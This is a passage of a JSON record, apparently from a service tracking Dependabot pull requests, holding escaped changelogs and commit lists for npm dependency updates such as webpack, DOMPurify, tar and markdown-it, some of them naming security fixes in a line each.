deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc\"\u003e\u003ccode\u003e24e3c2d\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20253\"\u003e#20253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2efd21b0b06baa9b1a7f009b336379dcef24c1a5\"\u003e\u003ccode\u003e2efd21b\u003c/code\u003e\u003c/a\u003e fix(re-exports): reexports runtime calculation should not accessing `__WEBPAC...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c5100702335a9cdcb75558ccd80def2329bd4abf\"\u003e\u003ccode\u003ec510070\u003c/code\u003e\u003c/a\u003e fix(security): userinfo bypass vulnerability in HttpUriPlugin allowedUris\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/4b0501c69700963bad1285b56f9cfa74704cb963\"\u003e\u003ccode\u003e4b0501c\u003c/code\u003e\u003c/a\u003e ci: fix release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20252\"\u003e#20252\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c213cecf2906bc41102c3a4cfdd1ad3522d0171\"\u003e\u003ccode\u003e0c213ce\u003c/code\u003e\u003c/a\u003e ci: use \u003ccode\u003e\\\u0026lt;@\u0026amp;1450591255485743204\u0026gt;\u003c/code\u003e over \u003ccode\u003e@here\u003c/code\u003e for discord notificationw\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/5bf8bc51bcfb49d25b73aae450b246cd8b8b423a\"\u003e\u003ccode\u003e5bf8bc5\u003c/code\u003e\u003c/a\u003e refactor: types for benchmarks and tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/505a5e744fbcf4471ddb534bf1d4aebea9643c1b\"\u003e\u003ccode\u003e505a5e7\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20188\"\u003e#20188\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c066808d59e4f9406e11bab4ffa2e0feacbd0e2\"\u003e\u003ccode\u003e0c06680\u003c/code\u003e\u003c/a\u003e refactor: update eslint configuration\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2eb0d6a410513960bd7d65bf15baf15704a612eb\"\u003e\u003ccode\u003e2eb0d6a\u003c/code\u003e\u003c/a\u003e ci: release announcement (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20238\"\u003e#20238\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/b2b24590a08755b706d2009ca97a226addf9e83b\"\u003e\u003ccode\u003eb2b2459\u003c/code\u003e\u003c/a\u003e ci: cancel in progress (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20239\"\u003e#20239\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack/compare/v5.90.3...v5.104.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cross-spawn` from 7.0.3 to 7.0.6\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/blob/v6.0.6/CHANGELOG.md\"\u003ecross-spawn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v6.0.5...v6.0.6\"\u003e6.0.6\u003c/a\u003e (2024-11-18)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edisable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e) (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/ba5aaef\"\u003eba5aaef\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e support worker threads (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/127\"\u003e#127\u003c/a\u003e) (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f4af31c\"\u003ef4af31c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003c!-- raw HTML omitted --\u003e\u003c!-- raw HTML omitted --\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/d35c865b877d2f9ded7c1ed87521c2fdb689c8dd\"\u003e\u003ccode\u003ed35c865\u003c/code\u003e\u003c/a\u003e chore(release): 6.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5a37e19173a759782e3f716b04c8df90a02daec8\"\u003e\u003ccode\u003e5a37e19\u003c/code\u003e\u003c/a\u003e chore: update package.json and package.lock\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/ba5aaef78340f0a4523a90276306b2f45fc6859a\"\u003e\u003ccode\u003eba5aaef\u003c/code\u003e\u003c/a\u003e fix: disable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f4af31c8ee70e1830450755eceac775876b391b9\"\u003e\u003ccode\u003ef4af31c\u003c/code\u003e\u003c/a\u003e fix(core): support worker threads (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/127\"\u003e#127\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v6.0.5...v6.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.1 to 1.15.11\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/21ef28a544c5e57f4c34b8476d75f2144609a1eb\"\u003e\u003ccode\u003e21ef28a\u003c/code\u003e\u003c/a\u003e Release version 1.15.11 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7c88135da3bd0681a7e156ee66b16b2f6f98b480\"\u003e\u003ccode\u003e7c88135\u003c/code\u003e\u003c/a\u003e Roll back tree shaking.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/6e389ba094beec211a8847788a146917a16c1bdb\"\u003e\u003ccode\u003e6e389ba\u003c/code\u003e\u003c/a\u003e Release version 1.15.10 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5bc496e0229abda823221e0c6267926a3f93f262\"\u003e\u003ccode\u003e5bc496e\u003c/code\u003e\u003c/a\u003e Shake me up before you go-go.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/694d6b47a42bc8377e5ef1480394de451e16bd5b\"\u003e\u003ccode\u003e694d6b4\u003c/code\u003e\u003c/a\u003e Bump minimist from 1.2.5 to 1.2.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/e4e55c77b2d849280d105943f49f42e0c735d05d\"\u003e\u003ccode\u003ee4e55c7\u003c/code\u003e\u003c/a\u003e Release version 1.15.9 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/31a1abf2d659ac1c8fcbe7e614a8c8914d80e1e3\"\u003e\u003ccode\u003e31a1abf\u003c/code\u003e\u003c/a\u003e Attempt much more gentle detection.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/d2aaa97439e8a7e4a9cd02513ec7b12f23c17638\"\u003e\u003ccode\u003ed2aaa97\u003c/code\u003e\u003c/a\u003e Fix url field.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/62558f0cd106195f4c17ece3ad255eb93487d37f\"\u003e\u003ccode\u003e62558f0\u003c/code\u003e\u003c/a\u003e Release version 1.15.8 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/a8d1ceed257d46758f913ff555b4f7e1cd758627\"\u003e\u003ccode\u003ea8d1cee\u003c/code\u003e\u003c/a\u003e Return subtlety.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.1...v1.15.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `dompurify` from 3.3.1 to 3.3.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/cure53/DOMPurify/releases\"\u003edompurify's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eDOMPurify 3.3.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed an engine requirement for Node 20 which caused hiccups, thanks \u003ca href=\"https://github.com/Rotzbua\"\u003e\u003ccode\u003e@​Rotzbua\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eDOMPurify 3.3.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a possible bypass caused by jsdom's faulty raw-text tag parsing, thanks multiple reporters\u003c/li\u003e\n\u003cli\u003eFixed a prototype pollution issue when working with custom elements, thanks \u003ca href=\"https://github.com/christos-eth\"\u003e\u003ccode\u003e@​christos-eth\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFixed a lenient config parsing in \u003ccode\u003e_isValidAttribute\u003c/code\u003e, thanks \u003ca href=\"https://github.com/christos-eth\"\u003e\u003ccode\u003e@​christos-eth\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBumped and removed several dependencies, thanks \u003ca href=\"https://github.com/Rotzbua\"\u003e\u003ccode\u003e@​Rotzbua\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFixed the test suite after bumping dependencies, thanks \u003ca href=\"https://github.com/Rotzbua\"\u003e\u003ccode\u003e@​Rotzbua\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/8bcbf73ae7eb56e7b4f1300b66cf543342c7ee27\"\u003e\u003ccode\u003e8bcbf73\u003c/code\u003e\u003c/a\u003e chore: Preparing 3.3.3 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/5faddd60af7b4d612f32a0c6b44432b77c8c490c\"\u003e\u003ccode\u003e5faddd6\u003c/code\u003e\u003c/a\u003e fix: engine requirement (\u003ca href=\"https://redirect.github.com/cure53/DOMPurify/issues/1210\"\u003e#1210\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/0f91e3add5c028bc4110c513b0c2571b284c35af\"\u003e\u003ccode\u003e0f91e3a\u003c/code\u003e\u003c/a\u003e Update README.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/d5ff1a8c605df1df998c2e7df2c4c8ac762b0dea\"\u003e\u003ccode\u003ed5ff1a8\u003c/code\u003e\u003c/a\u003e Merge branch 'main' of github.com:cure53/DOMPurify\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/c3efd489010366e755de9d65fd741888fd8b7462\"\u003e\u003ccode\u003ec3efd48\u003c/code\u003e\u003c/a\u003e fix: moved back from jsdom 28 to jsdom 20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/988b888108c8df911ef37e68d0e26c85ad90e885\"\u003e\u003ccode\u003e988b888\u003c/code\u003e\u003c/a\u003e fix: moved back from jsdom 28 to jsdom 20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/2726c74e9c6a0645127d1630e5ca49f64bc9fe67\"\u003e\u003ccode\u003e2726c74\u003c/code\u003e\u003c/a\u003e chore: Preparing 3.3.2 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/6202c7e43e9df01ba606396aed60fbae5583f7a1\"\u003e\u003ccode\u003e6202c7e\u003c/code\u003e\u003c/a\u003e build(deps): bump \u003ccode\u003e@​tootallnate/once\u003c/code\u003e and jsdom (\u003ca href=\"https://redirect.github.com/cure53/DOMPurify/issues/1204\"\u003e#1204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/302b51de22535cc90235472c52e3401bedd46f80\"\u003e\u003ccode\u003e302b51d\u003c/code\u003e\u003c/a\u003e fix: Expanded the regex ever so slightly to also cover script\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/cd85175da3c4614aeb0f1022f2a347e5e9bdd58b\"\u003e\u003ccode\u003ecd85175\u003c/code\u003e\u003c/a\u003e Merge branch 'main' of github.com:cure53/DOMPurify\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/cure53/DOMPurify/compare/3.3.1...3.3.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `svgo` from 3.3.2 to 3.3.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/svg/svgo/releases\"\u003esvgo's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.3.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eDependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMigrates from our unsupported fork of sax (\u003ca href=\"https://www.npmjs.com/package/@trysound/sax\"\u003e\u003ccode\u003e@​trysound/sax\u003c/code\u003e\u003c/a\u003e) to the upstream version of sax (\u003ca href=\"https://www.npmjs.com/package/sax\"\u003esax\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eNo longer throws error when encountering comments in DTD.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMetrics\u003c/h2\u003e\n\u003cp\u003eBefore and after of the browser bundle of each respective version:\u003c/p\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003e\u003c/th\u003e\n\u003cth\u003ev3.3.2\u003c/th\u003e\n\u003cth\u003ev3.3.3\u003c/th\u003e\n\u003cth\u003eDelta\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003esvgo.browser.js\u003c/td\u003e\n\u003ctd\u003e910.9 kB\u003c/td\u003e\n\u003ctd\u003e912.9 kB\u003c/td\u003e\n\u003ctd\u003e⬆️ 2 kB\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch2\u003eSupport\u003c/h2\u003e\n\u003cp\u003eSVGO v3 is not officially supported, please consider upgrading to SVGO v4 instead. We've backported this fix as there are security implications, but there is no commitment to do this for more complex changes in future.\u003c/p\u003e\n\u003cp\u003eConsider reading our \u003ca href=\"https://svgo.dev/docs/migrations/migration-from-v3-to-v4/\"\u003eMigration Guide from v3 to v4\u003c/a\u003e which should ease the process.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/svg/svgo/commit/bbab162534d89654ac51c30dd6e62d7163b48a5e\"\u003e\u003ccode\u003ebbab162\u003c/code\u003e\u003c/a\u003e deps: upgrade to sax v1.5.0\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/svg/svgo/compare/v3.3.2...v3.3.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tar` from 7.5.10 to 7.5.11\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/bf776f673164215074b62749e0fe80e5834588f4\"\u003e\u003ccode\u003ebf776f6\u003c/code\u003e\u003c/a\u003e 7.5.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad\"\u003e\u003ccode\u003ef48b5fa\u003c/code\u003e\u003c/a\u003e prevent escaping symlinks with drive-relative paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/97cff15d3539a37a4095eb3d287147d9d77c2dc3\"\u003e\u003ccode\u003e97cff15\u003c/code\u003e\u003c/a\u003e docs: more security info\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-tar/compare/v7.5.10...v7.5.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tar` from 7.5.10 to 7.5.11\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/bf776f673164215074b62749e0fe80e5834588f4\"\u003e\u003ccode\u003ebf776f6\u003c/code\u003e\u003c/a\u003e 7.5.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad\"\u003e\u003ccode\u003ef48b5fa\u003c/code\u003e\u003c/a\u003e prevent escaping symlinks with drive-relative paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/97cff15d3539a37a4095eb3d287147d9d77c2dc3\"\u003e\u003ccode\u003e97cff15\u003c/code\u003e\u003c/a\u003e docs: more security info\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-tar/compare/v7.5.10...v7.5.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `markdown-it` from 13.0.2 to 14.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/markdown-it/markdown-it/blob/master/CHANGELOG.md\"\u003emarkdown-it's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[14.1.1] - 2026-01-11\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed regression from v13 in linkify inline rule. Specific patterns could\ncause high CPU use. Thanks to \u003ca href=\"https://github.com/ltduc147\"\u003e\u003ccode\u003e@​ltduc147\u003c/code\u003e\u003c/a\u003e for report.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[14.1.0] - 2024-03-19\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated CM spec compatibility to 0.31.2, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1009\"\u003e#1009\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed quadratic complexity when parsing references, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/996\"\u003e#996\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eFixed quadratic output size with pathological user input in tables, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1000\"\u003e#1000\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[14.0.0] - 2023-12-08\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDrop ancient browsers support (use \u003ccode\u003e.fromCodePoint\u003c/code\u003e and other features).\u003c/li\u003e\n\u003cli\u003eRewrite to ESM (including all plugins/deps). CJS fallback still available.\nNo signatures changed, except \u003ccode\u003emarkdown-it-emoji\u003c/code\u003e plugin.\u003c/li\u003e\n\u003cli\u003eDropped \u003ccode\u003edist/\u003c/code\u003e folder from repo, build on package publish.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003epunicode.js\u003c/code\u003e as external dependency.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eHtml tokens inside img alt are now rendered as their original text, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/896\"\u003e#896\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eHardbreaks inside img alt are now rendered as newlines.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/b4a9b659ef5734223731cfaa3ad5eacc6fc22918\"\u003e\u003ccode\u003eb4a9b65\u003c/code\u003e\u003c/a\u003e 14.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/4b4bbcae5e0990a5b172378e507b33a59012ed26\"\u003e\u003ccode\u003e4b4bbca\u003c/code\u003e\u003c/a\u003e Fixed perf regression in linkify-it wrapper\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/d2782d892a51201b25d3eeab172201ad5a53a24c\"\u003e\u003ccode\u003ed2782d8\u003c/code\u003e\u003c/a\u003e Add supplementary example-drive...\n\n_Description has been truncated_","html_url":"https://github.com/preechapon250/strapi/pull/10","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/preechapon250%2Fstrapi/issues/10","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10/packages"}},{"old_version":"2.21.3","new_version":"14.0.0","update_type":"major","path":null,"pr_created_at":"2026-03-20T11:31:54.000Z","version_change":"2.21.3 → 14.0.0","issue":{"uuid":"4107359273","node_id":"PR_kwDOOgwah87MHs6E","number":6,"state":"closed","title":"Bump the npm_and_yarn group across 1 directory with 9 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-07T14:57:43.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-20T11:31:54.000Z","updated_at":"2026-04-07T14:57:45.000Z","time_to_close":1567549,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":9,"packages":[{"name":"form-data","old_version":"2.5.1","new_version":"2.5.5","repository_url":"https://github.com/form-data/form-data"},{"name":"form-data","old_version":"4.0.0","new_version":"4.0.5","repository_url":"https://github.com/form-data/form-data"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.12","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"flatted","old_version":"3.2.9","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"undici","old_version":"5.28.5","new_version":"6.24.1","repository_url":"https://github.com/nodejs/undici"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 7 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [form-data](https://github.com/form-data/form-data) | `2.5.1` | `2.5.5` |\n| [form-data](https://github.com/form-data/form-data) | `4.0.0` | `4.0.5` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| 